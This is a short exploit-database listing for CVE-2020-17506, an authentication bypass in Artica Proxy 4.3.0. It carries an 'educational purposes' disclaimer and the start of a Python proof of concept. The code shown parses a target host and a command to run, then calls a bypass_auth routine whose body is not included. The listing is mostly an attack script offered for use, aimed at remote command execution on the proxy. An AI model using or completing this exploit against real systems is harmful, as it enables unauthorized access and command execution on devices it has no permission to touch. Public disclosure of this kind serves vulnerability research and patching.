Exploits / Vulnerability Discovered : 2020-08-13 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Artica proxy 4.3.0 authentication bypass is for educational purposes only and if it is used you will do on your own risk!
def main():
parser = argparse.ArgumentParser(description="CVE-2020-17506 Artica PoC.")
parser.add_argument(
"--host", help="The host to target. Format example: https://host:port",
)
parser.add_argument("--command", help="The command to run")
args = parser.parse_args()
if not args.host or not args.command:
parser.print_help()
exit(0)
session = requests.Session()
session = bypass_auth(session, args)